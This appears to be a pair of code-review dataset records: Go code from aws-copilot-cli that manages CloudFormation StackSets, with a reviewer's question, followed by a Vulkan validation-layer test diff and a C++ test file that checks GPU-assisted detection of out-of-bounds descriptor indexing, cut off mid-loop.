toStack(stack.NewAppStackConfig(&deployApp)) if err != nil { return err } if err := cf.cfnClient.UpdateAndWait(s); err != nil { var errNoUpdates *cloudformation.ErrChangeSetEmpty if errors.As(err, &errNoUpdates) { return nil } return fmt.Errorf("updating application to allow DNS delegation: %w", err) } return nil } // GetAppResourcesByRegion fetches all the regional resources for a particular region. func (cf CloudFormation) GetAppResourcesByRegion(app *config.Application, region string) (*stack.AppRegionalResources, error) { resources, err := cf.getResourcesForStackInstances(app, &region) if err != nil { return nil, fmt.Errorf("describing application resources: %w", err) } if len(resources) == 0 { return nil, fmt.Errorf("no regional resources for application %s in region %s found", app.Name, region) } return resources[0], nil } // GetRegionalAppResources fetches all the regional resources for a particular application. func (cf CloudFormation) GetRegionalAppResources(app *config.Application) ([]*stack.AppRegionalResources, error) { resources, err := cf.getResourcesForStackInstances(app, nil) if err != nil { return nil, fmt.Errorf("describing application resources: %w", err) } return resources, nil } func (cf CloudFormation) getResourcesForStackInstances(app *config.Application, region *string) ([]*stack.AppRegionalResources, error) { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, }) opts := []stackset.InstanceSummariesOption{ stackset.FilterSummariesByAccountID(app.AccountID), } if region != nil { opts = append(opts, stackset.FilterSummariesByRegion(*region)) } summaries, err := cf.appStackSet.InstanceSummaries(appConfig.StackSetName(), opts...) if err != nil { return nil, err } var regionalResources []*stack.AppRegionalResources for _, summary := range summaries { // Since these stacks will likely be in another region, we can't use // the default cf client. Instead, we'll have to create a new client // configured with the stack's region. 
regionalCFClient := cf.regionalClient(summary.Region) cfStack, err := regionalCFClient.Describe(summary.StackID) if err != nil { return nil, fmt.Errorf("getting outputs for stack %s in region %s: %w", summary.StackID, summary.Region, err) } regionalResource, err := stack.ToAppRegionalResources(cfStack.SDK()) if err != nil { return nil, err } regionalResource.Region = summary.Region regionalResources = append(regionalResources, regionalResource) } return regionalResources, nil } // AddServiceToApp attempts to add new service specific resources to the application resource stack. // Currently, this means that we'll set up an ECR repo with a policy for all envs to be able // to pull from it. func (cf CloudFormation) AddServiceToApp(app *config.Application, svcName string) error { if err := cf.addWorkloadToApp(app, svcName); err != nil { return fmt.Errorf("adding service %s resources to application %s: %w", svcName, app.Name, err) } return nil } // AddJobToApp attempts to add new job-specific resources to the application resource stack. // Currently, this means that we'll set up an ECR repo with a policy for all envs to be able // to pull from it. func (cf CloudFormation) AddJobToApp(app *config.Application, jobName string) error { if err := cf.addWorkloadToApp(app, jobName); err != nil { return fmt.Errorf("adding job %s resources to application %s: %w", jobName, app.Name, err) } return nil } func (cf CloudFormation) addWorkloadToApp(app *config.Application, wlName string) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, AdditionalTags: app.Tags, Version: deploy.LatestAppTemplateVersion, }) previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(appConfig) if err != nil { return err } // We'll generate a new list of Accounts to add to our application // infrastructure by appending the environment's account if it // doesn't already exist. var wlList []string shouldAddNewWl := true // For now, AppResourcesConfig.Services refers to workloads, including both services and jobs. for _, wl := range previouslyDeployedConfig.Services { wlList = append(wlList, wl) if wl == wlName { shouldAddNewWl = false } } if !shouldAddNewWl { return nil } wlList = append(wlList, wlName) newDeploymentConfig := stack.AppResourcesConfig{ Version: previouslyDeployedConfig.Version + 1, Services: wlList, Accounts: previouslyDeployedConfig.Accounts, App: appConfig.Name, } if err := cf.deployAppConfig(appConfig, &newDeploymentConfig); err != nil { return err } return nil } // RemoveServiceFromApp attempts to remove service-specific resources (ECR repositories) from the application resource stack. func (cf CloudFormation) RemoveServiceFromApp(app *config.Application, svcName string) error { if err := cf.removeWorkloadFromApp(app, svcName); err != nil { return fmt.Errorf("removing %s service resources from application: %w", svcName, err) } return nil } // RemoveJobFromApp attempts to remove job-specific resources (ECR repositories) from the application resource stack. 
func (cf CloudFormation) RemoveJobFromApp(app *config.Application, jobName string) error { if err := cf.removeWorkloadFromApp(app, jobName); err != nil { return fmt.Errorf("removing %s job resources from application: %w", jobName, err) } return nil } func (cf CloudFormation) removeWorkloadFromApp(app *config.Application, wlName string) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, Version: deploy.LatestAppTemplateVersion, }) previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(appConfig) if err != nil { return fmt.Errorf("get previous application %s config: %w", app.Name, err) } // We'll generate a new list of Accounts to remove the account associated // with the input workload to be removed. var wlList []string shouldRemoveWl := false // For now, AppResourcesConfig.Services refers to workloads, including both services and jobs. for _, wl := range previouslyDeployedConfig.Services { if wl == wlName { shouldRemoveWl = true continue } wlList = append(wlList, wl) } if !shouldRemoveWl { return nil } newDeploymentConfig := stack.AppResourcesConfig{ Version: previouslyDeployedConfig.Version + 1, Services: wlList, Accounts: previouslyDeployedConfig.Accounts, App: appConfig.Name, } if err := cf.deployAppConfig(appConfig, &newDeploymentConfig); err != nil { return err } return nil } // AddEnvToAppOpts contains the parameters to call AddEnvToApp. type AddEnvToAppOpts struct { App *config.Application EnvName string EnvAccountID string EnvRegion string } // AddEnvToApp takes a new environment and updates the application configuration // with new Account IDs in resource policies (KMS Keys and ECR Repos) - and // sets up a new stack instance if the environment is in a new region. func (cf CloudFormation) AddEnvToApp(opts *AddEnvToAppOpts) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: opts.App.Name, AccountID: opts.App.AccountID, AdditionalTags: opts.App.Tags, Version: deploy.LatestAppTemplateVersion, }) previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(appConfig) if err != nil { return fmt.Errorf("getting previous deployed stackset %w", err) } // We'll generate a new list of Accounts to add to our application // infrastructure by appending the environment's account if it // doesn't already exist. 
var accountList []string shouldAddNewAccountID := true for _, accountID := range previouslyDeployedConfig.Accounts { accountList = append(accountList, accountID) if accountID == opts.EnvAccountID { shouldAddNewAccountID = false } } if shouldAddNewAccountID { accountList = append(accountList, opts.EnvAccountID) } newDeploymentConfig := stack.AppResourcesConfig{ Version: previouslyDeployedConfig.Version + 1, Services: previouslyDeployedConfig.Services, Accounts: accountList, App: appConfig.Name, } if err := cf.deployAppConfig(appConfig, &newDeploymentConfig); err != nil { return fmt.Errorf("adding %s environment resources to application: %w", opts.EnvName, err) } if err := cf.addNewAppStackInstances(appConfig, opts.EnvRegion); err != nil { return fmt.Errorf("adding new stack instance for environment %s: %w", opts.EnvName, err) } return nil } var getRegionFromClient = func(client sdkcloudformationiface.CloudFormationAPI) (string, error) { concrete, ok := client.(*sdkcloudformation.CloudFormation) if !ok { return "", errors.New("failed to retrieve the region") } return *concrete.Client.Config.Region, nil } // AddPipelineResourcesToApp conditionally adds resources needed to support // a pipeline in the application region (i.e. the same region that hosts our SSM store). // This is necessary because the application region might not contain any environment. func (cf CloudFormation) AddPipelineResourcesToApp( app *config.Application, appRegion string) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, Version: deploy.LatestAppTemplateVersion, }) // conditionally create a new stack instance in the application region // if there's no existing stack instance. if err := cf.addNewAppStackInstances(appConfig, appRegion); err != nil { return fmt.Errorf("failed to add stack instance for pipeline, application: %s, region: %s, error: %w", app.Name, appRegion, err) } return nil } func (cf CloudFormation) deployAppConfig(appConfig *stack.AppStackConfig, resources *stack.AppResourcesConfig) error { newTemplateToDeploy, err := appConfig.ResourceTemplate(resources) if err != nil { return err } // Every time we deploy the StackSet, we include a version field in the stack metadata. // When we go to update the StackSet, we include that version + 1 as the "Operation ID". // This ensures that we don't overwrite any changes that may have been applied between // us reading the stack and actually updating it. // As an example: // * We read the stack with Version 1 // * Someone else reads the stack with Version 1 // * We update the StackSet with Version 2, the update completes. // * Someone else tries to update the StackSet with their stale version 2. // * "2" has already been used as an operation ID, and the stale write fails. return cf.appStackSet.UpdateAndWait(appConfig.StackSetName(), newTemplateToDeploy, stackset.WithOperationID(fmt.Sprintf("%d", resources.Version)), stackset.WithDescription(appConfig.StackSetDescription()), stackset.WithExecutionRoleName(appConfig.StackSetExecutionRoleName()), stackset.WithAdministrationRoleARN(appConfig.StackSetAdminRoleARN()), stackset.WithTags(toMap(appConfig.Tags()))) } // addNewAppStackInstances takes an environment and determines if we need to create a new // stack instance. We only spin up a new stack instance if the env is in a new region. 
func (cf CloudFormation) addNewAppStackInstances(appConfig *stack.AppStackConfig, region string) error { summaries, err := cf.appStackSet.InstanceSummaries(appConfig.StackSetName()) if err != nil { return err } // We only want to deploy a new StackInstance if we're // adding an environment in a new region. shouldDeployNewStackInstance := true for _, summary := range summaries { if summary.Region == region { shouldDeployNewStackInstance = false } } if !shouldDeployNewStackInstance { return nil } // Set up a new Stack Instance for the new region. The Stack Instance will inherit the latest StackSet template. return cf.appStackSet.CreateInstancesAndWait(appConfig.StackSetName(), []string{appConfig.AccountID}, []string{region}) } func (cf CloudFormation) getLastDeployedAppConfig(appConfig *stack.AppStackConfig) (*stack.AppResourcesConfig, error) { // Check the existing deploy stack template. From that template, we'll parse out the list of services and accounts that // are deployed in the stack. descr, err := cf.appStackSet.Describe(appConfig.StackSetName()) if err != nil { return nil, err } previouslyDeployedConfig, err := stack.AppConfigFrom(&descr.Template) if err != nil { return nil, fmt.Errorf("parse previous deployed stackset %w", err) } return previouslyDeployedConfig, nil } // DeleteApp deletes all application specific StackSet and Stack resources. func (cf CloudFormation) DeleteApp(appName string) error { if err := cf.appStackSet.Delete(fmt.Sprintf("%s-infrastructure", appName)); err != nil { return err } return cf.cfnClient.DeleteAndWait(fmt.Sprintf("%s-infrastructure-roles", appName)) }
1
17,252
Why did we make this change? How come it wasn't an issue before?
aws-copilot-cli
go
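The question above is about the added line `previouslyDeployedConfig.App = appConfig.Name`. A minimal sketch, using simplified stand-in types and JSON rather than the actual copilot-cli structs and template format, of why a field that did not exist when an older template was rendered comes back as the zero value after parsing and has to be backfilled before the config is bumped and redeployed:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Simplified stand-in for the deployed app resources config.
type appResourcesConfig struct {
	Version  int      `json:"Version"`
	App      string   `json:"App"`
	Services []string `json:"Services"`
}

func main() {
	// A previously deployed config serialized before the "App" field existed.
	oldTemplate := []byte(`{"Version": 3, "Services": ["api", "worker"]}`)

	var prev appResourcesConfig
	if err := json.Unmarshal(oldTemplate, &prev); err != nil {
		panic(err)
	}
	fmt.Printf("parsed App=%q\n", prev.App) // "" -- zero value, would render an empty app name

	// Backfill from the in-memory app config before bumping the version and redeploying.
	prev.App = "my-app"
	prev.Version++
	fmt.Printf("redeploy App=%q Version=%d\n", prev.App, prev.Version)
}
```

This mirrors the pattern already used elsewhere in the file, where newly built AppResourcesConfig values set App explicitly; the upgrade path reuses the parsed config directly, so it only became visible once the template started depending on that field.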
@@ -4342,14 +4342,11 @@ TEST_F(VkLayerTest, InvalidDescriptorSet) { // ObjectTracker should catch this. // Create a valid cmd buffer // call vk::CmdBindDescriptorSets w/ false Descriptor Set + ASSERT_NO_FATAL_FAILURE(Init()); uint64_t fake_set_handle = 0xbaad6001; VkDescriptorSet bad_set = reinterpret_cast<VkDescriptorSet &>(fake_set_handle); - m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBindDescriptorSets-pDescriptorSets-parameter"); - - ASSERT_NO_FATAL_FAILURE(Init()); - VkDescriptorSetLayoutBinding layout_binding = {}; layout_binding.binding = 0; layout_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER;
1
/* * Copyright (c) 2015-2020 The Khronos Group Inc. * Copyright (c) 2015-2020 Valve Corporation * Copyright (c) 2015-2020 LunarG, Inc. * Copyright (c) 2015-2020 Google, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Author: Chia-I Wu <[email protected]> * Author: Chris Forbes <[email protected]> * Author: Courtney Goeltzenleuchter <[email protected]> * Author: Mark Lobodzinski <[email protected]> * Author: Mike Stroyan <[email protected]> * Author: Tobin Ehlis <[email protected]> * Author: Tony Barbour <[email protected]> * Author: Cody Northrop <[email protected]> * Author: Dave Houlton <[email protected]> * Author: Jeremy Kniager <[email protected]> * Author: Shannon McPherson <[email protected]> * Author: John Zulauf <[email protected]> */ #include "cast_utils.h" #include "layer_validation_tests.h" TEST_F(VkLayerTest, GpuValidationArrayOOBGraphicsShaders) { TEST_DESCRIPTION( "GPU validation: Verify detection of out-of-bounds descriptor array indexing and use of uninitialized descriptors."); VkValidationFeatureEnableEXT enables[] = {VK_VALIDATION_FEATURE_ENABLE_GPU_ASSISTED_EXT}; VkValidationFeaturesEXT features = {}; features.sType = VK_STRUCTURE_TYPE_VALIDATION_FEATURES_EXT; features.enabledValidationFeatureCount = 1; features.pEnabledValidationFeatures = enables; bool descriptor_indexing = CheckDescriptorIndexingSupportAndInitFramework(this, m_instance_extension_names, m_device_extension_names, &features, m_errorMonitor); if (DeviceIsMockICD() || DeviceSimulation()) { printf("%s GPU-Assisted validation test requires a driver that can draw.\n", kSkipPrefix); return; } VkPhysicalDeviceFeatures2KHR features2 = {}; auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); if (descriptor_indexing) { PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); if (!indexing_features.runtimeDescriptorArray || !indexing_features.descriptorBindingSampledImageUpdateAfterBind || !indexing_features.descriptorBindingPartiallyBound || !indexing_features.descriptorBindingVariableDescriptorCount || !indexing_features.shaderSampledImageArrayNonUniformIndexing || !indexing_features.shaderStorageBufferArrayNonUniformIndexing) { printf("Not all descriptor indexing features supported, skipping descriptor indexing tests\n"); descriptor_indexing = false; } } VkCommandPoolCreateFlags pool_flags = VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, pool_flags)); if (m_device->props.apiVersion < VK_API_VERSION_1_1) { printf("%s GPU-Assisted validation test requires Vulkan 1.1+.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Make a uniform buffer to be passed to the shader that contains the invalid array index. 
uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 1024; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer0; VkMemoryPropertyFlags mem_props = VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT; buffer0.init(*m_device, bci, mem_props); bci.usage = VK_BUFFER_USAGE_STORAGE_BUFFER_BIT; // Make another buffer to populate the buffer array to be indexed VkBufferObj buffer1; buffer1.init(*m_device, bci, mem_props); void *layout_pnext = nullptr; void *allocate_pnext = nullptr; auto pool_create_flags = 0; auto layout_create_flags = 0; VkDescriptorBindingFlagsEXT ds_binding_flags[2] = {}; VkDescriptorSetLayoutBindingFlagsCreateInfoEXT layout_createinfo_binding_flags[1] = {}; if (descriptor_indexing) { ds_binding_flags[0] = 0; ds_binding_flags[1] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT; layout_createinfo_binding_flags[0].sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_BINDING_FLAGS_CREATE_INFO_EXT; layout_createinfo_binding_flags[0].pNext = NULL; layout_createinfo_binding_flags[0].bindingCount = 2; layout_createinfo_binding_flags[0].pBindingFlags = ds_binding_flags; layout_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; pool_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; layout_pnext = layout_createinfo_binding_flags; } // Prepare descriptors OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 6, VK_SHADER_STAGE_ALL, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags); VkDescriptorSetVariableDescriptorCountAllocateInfoEXT variable_count = {}; uint32_t desc_counts; if (descriptor_indexing) { layout_create_flags = 0; pool_create_flags = 0; ds_binding_flags[1] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_VARIABLE_DESCRIPTOR_COUNT_BIT_EXT; desc_counts = 6; // We'll reserve 8 spaces in the layout, but the descriptor will only use 6 variable_count.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_VARIABLE_DESCRIPTOR_COUNT_ALLOCATE_INFO_EXT; variable_count.descriptorSetCount = 1; variable_count.pDescriptorCounts = &desc_counts; allocate_pnext = &variable_count; } OneOffDescriptorSet descriptor_set_variable(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 8, VK_SHADER_STAGE_ALL, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags, allocate_pnext); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); const VkPipelineLayoutObj pipeline_layout_variable(m_device, {&descriptor_set_variable.layout_}); VkTextureObj texture(m_device, nullptr); VkSamplerObj sampler(m_device); VkDescriptorBufferInfo buffer_info[1] = {}; buffer_info[0].buffer = buffer0.handle(); buffer_info[0].offset = 0; buffer_info[0].range = sizeof(uint32_t); VkDescriptorImageInfo image_info[6] = {}; for (int i = 0; i < 6; i++) { image_info[i] = texture.DescriptorImageInfo(); image_info[i].sampler = sampler.handle(); image_info[i].imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; } VkWriteDescriptorSet descriptor_writes[2] = {}; descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[0].dstSet = descriptor_set.set_; // descriptor_set; descriptor_writes[0].dstBinding = 
0; descriptor_writes[0].descriptorCount = 1; descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_writes[0].pBufferInfo = buffer_info; descriptor_writes[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[1].dstSet = descriptor_set.set_; // descriptor_set; descriptor_writes[1].dstBinding = 1; if (descriptor_indexing) descriptor_writes[1].descriptorCount = 5; // Intentionally don't write index 5 else descriptor_writes[1].descriptorCount = 6; descriptor_writes[1].descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_writes[1].pImageInfo = image_info; vk::UpdateDescriptorSets(m_device->device(), 2, descriptor_writes, 0, NULL); if (descriptor_indexing) { descriptor_writes[0].dstSet = descriptor_set_variable.set_; descriptor_writes[1].dstSet = descriptor_set_variable.set_; vk::UpdateDescriptorSets(m_device->device(), 2, descriptor_writes, 0, NULL); } ds_binding_flags[0] = 0; ds_binding_flags[1] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT; // Resources for buffer tests OneOffDescriptorSet descriptor_set_buffer(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 6, VK_SHADER_STAGE_ALL, nullptr}, }, 0, layout_pnext, 0); const VkPipelineLayoutObj pipeline_layout_buffer(m_device, {&descriptor_set_buffer.layout_}); VkDescriptorBufferInfo buffer_test_buffer_info[7] = {}; buffer_test_buffer_info[0].buffer = buffer0.handle(); buffer_test_buffer_info[0].offset = 0; buffer_test_buffer_info[0].range = sizeof(uint32_t); for (int i = 1; i < 7; i++) { buffer_test_buffer_info[i].buffer = buffer1.handle(); buffer_test_buffer_info[i].offset = 0; buffer_test_buffer_info[i].range = 4 * sizeof(float); } if (descriptor_indexing) { VkWriteDescriptorSet buffer_descriptor_writes[2] = {}; buffer_descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; buffer_descriptor_writes[0].dstSet = descriptor_set_buffer.set_; // descriptor_set; buffer_descriptor_writes[0].dstBinding = 0; buffer_descriptor_writes[0].descriptorCount = 1; buffer_descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; buffer_descriptor_writes[0].pBufferInfo = buffer_test_buffer_info; buffer_descriptor_writes[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; buffer_descriptor_writes[1].dstSet = descriptor_set_buffer.set_; // descriptor_set; buffer_descriptor_writes[1].dstBinding = 1; buffer_descriptor_writes[1].descriptorCount = 5; // Intentionally don't write index 5 buffer_descriptor_writes[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; buffer_descriptor_writes[1].pBufferInfo = &buffer_test_buffer_info[1]; vk::UpdateDescriptorSets(m_device->device(), 2, buffer_descriptor_writes, 0, NULL); } // Shader programs for array OOB test in vertex stage: // - The vertex shader fetches the invalid index from the uniform buffer and uses it to make an invalid index into another // array. 
char const *vsSource_vert = "#version 450\n" "\n" "layout(std140, set = 0, binding = 0) uniform foo { uint tex_index[1]; } uniform_index_buffer;\n" "layout(set = 0, binding = 1) uniform sampler2D tex[6];\n" "vec2 vertices[3];\n" "void main(){\n" " vertices[0] = vec2(-1.0, -1.0);\n" " vertices[1] = vec2( 1.0, -1.0);\n" " vertices[2] = vec2( 0.0, 1.0);\n" " gl_Position = vec4(vertices[gl_VertexIndex % 3], 0.0, 1.0);\n" " gl_Position += 1e-30 * texture(tex[uniform_index_buffer.tex_index[0]], vec2(0, 0));\n" "}\n"; char const *fsSource_vert = "#version 450\n" "\n" "layout(set = 0, binding = 1) uniform sampler2D tex[6];\n" "layout(location = 0) out vec4 uFragColor;\n" "void main(){\n" " uFragColor = texture(tex[0], vec2(0, 0));\n" "}\n"; // Shader programs for array OOB test in fragment stage: // - The vertex shader fetches the invalid index from the uniform buffer and passes it to the fragment shader. // - The fragment shader makes the invalid array access. char const *vsSource_frag = "#version 450\n" "\n" "layout(std140, binding = 0) uniform foo { uint tex_index[1]; } uniform_index_buffer;\n" "layout(location = 0) out flat uint index;\n" "vec2 vertices[3];\n" "void main(){\n" " vertices[0] = vec2(-1.0, -1.0);\n" " vertices[1] = vec2( 1.0, -1.0);\n" " vertices[2] = vec2( 0.0, 1.0);\n" " gl_Position = vec4(vertices[gl_VertexIndex % 3], 0.0, 1.0);\n" " index = uniform_index_buffer.tex_index[0];\n" "}\n"; char const *fsSource_frag = "#version 450\n" "\n" "layout(set = 0, binding = 1) uniform sampler2D tex[6];\n" "layout(location = 0) out vec4 uFragColor;\n" "layout(location = 0) in flat uint index;\n" "void main(){\n" " uFragColor = texture(tex[index], vec2(0, 0));\n" "}\n"; char const *fsSource_frag_runtime = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n" "\n" "layout(set = 0, binding = 1) uniform sampler2D tex[];\n" "layout(location = 0) out vec4 uFragColor;\n" "layout(location = 0) in flat uint index;\n" "void main(){\n" " uFragColor = texture(tex[index], vec2(0, 0));\n" "}\n"; char const *fsSource_buffer = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "\n" "layout(set = 0, binding = 1) buffer foo { vec4 val; } colors[];\n" "layout(location = 0) out vec4 uFragColor;\n" "layout(location = 0) in flat uint index;\n" "void main(){\n" " uFragColor = colors[index].val;\n" "}\n"; char const *gsSource = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "layout(triangles) in;\n" "layout(triangle_strip, max_vertices=3) out;\n" "layout(location=0) in VertexData { vec4 x; } gs_in[];\n" "layout(std140, set = 0, binding = 0) uniform ufoo { uint index; } uniform_index_buffer;\n" "layout(set = 0, binding = 1) buffer bfoo { vec4 val; } adds[];\n" "void main() {\n" " gl_Position = gs_in[0].x + adds[uniform_index_buffer.index].val.x;\n" " EmitVertex();\n" "}\n"; static const char *tesSource = "#version 450\n" "#extension GL_EXT_nonuniform_qualifier : enable\n " "layout(std140, set = 0, binding = 0) uniform ufoo { uint index; } uniform_index_buffer;\n" "layout(set = 0, binding = 1) buffer bfoo { vec4 val; } adds[];\n" "layout(triangles, equal_spacing, cw) in;\n" "void main() {\n" " gl_Position = adds[uniform_index_buffer.index].val;\n" "}\n"; struct TestCase { char const *vertex_source; char const *fragment_source; char const *geometry_source; char const *tess_ctrl_source; char const *tess_eval_source; bool debug; const VkPipelineLayoutObj *pipeline_layout; const OneOffDescriptorSet *descriptor_set; uint32_t index; char const *expected_error; }; 
std::vector<TestCase> tests; tests.push_back({vsSource_vert, fsSource_vert, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 25, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_frag, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 25, "Index of 25 used to index descriptor array of length 6."}); #if !defined(ANDROID) // The Android test framework uses shaderc for online compilations. Even when configured to compile with debug info, // shaderc seems to drop the OpLine instructions from the shader binary. This causes the following two tests to fail // on Android platforms. Skip these tests until the shaderc issue is understood/resolved. tests.push_back({vsSource_vert, fsSource_vert, nullptr, nullptr, nullptr, true, &pipeline_layout, &descriptor_set, 25, "gl_Position += 1e-30 * texture(tex[uniform_index_buffer.tex_index[0]], vec2(0, 0));"}); tests.push_back({vsSource_frag, fsSource_frag, nullptr, nullptr, nullptr, true, &pipeline_layout, &descriptor_set, 25, "uFragColor = texture(tex[index], vec2(0, 0));"}); #endif if (descriptor_indexing) { tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 25, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout, &descriptor_set, 5, "Descriptor index 5 is uninitialized"}); // Pick 6 below because it is less than the maximum specified, but more than the actual specified tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout_variable, &descriptor_set_variable, 6, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_frag_runtime, nullptr, nullptr, nullptr, false, &pipeline_layout_variable, &descriptor_set_variable, 5, "Descriptor index 5 is uninitialized"}); tests.push_back({vsSource_frag, fsSource_buffer, nullptr, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 25, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({vsSource_frag, fsSource_buffer, nullptr, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 5, "Descriptor index 5 is uninitialized"}); if (m_device->phy().features().geometryShader) { // OOB Geometry tests.push_back({bindStateVertShaderText, bindStateFragShaderText, gsSource, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 25, "Stage = Geometry"}); // Uninitialized Geometry tests.push_back({bindStateVertShaderText, bindStateFragShaderText, gsSource, nullptr, nullptr, false, &pipeline_layout_buffer, &descriptor_set_buffer, 5, "Stage = Geometry"}); } if (m_device->phy().features().tessellationShader) { tests.push_back({bindStateVertShaderText, bindStateFragShaderText, nullptr, bindStateTscShaderText, tesSource, false, &pipeline_layout_buffer, &descriptor_set_buffer, 25, "Stage = Tessellation Eval"}); tests.push_back({bindStateVertShaderText, bindStateFragShaderText, nullptr, bindStateTscShaderText, tesSource, false, &pipeline_layout_buffer, &descriptor_set_buffer, 5, "Stage = Tessellation Eval"}); } } VkViewport viewport = m_viewports[0]; VkRect2D scissors = m_scissors[0]; VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); for (const auto &iter : tests) 
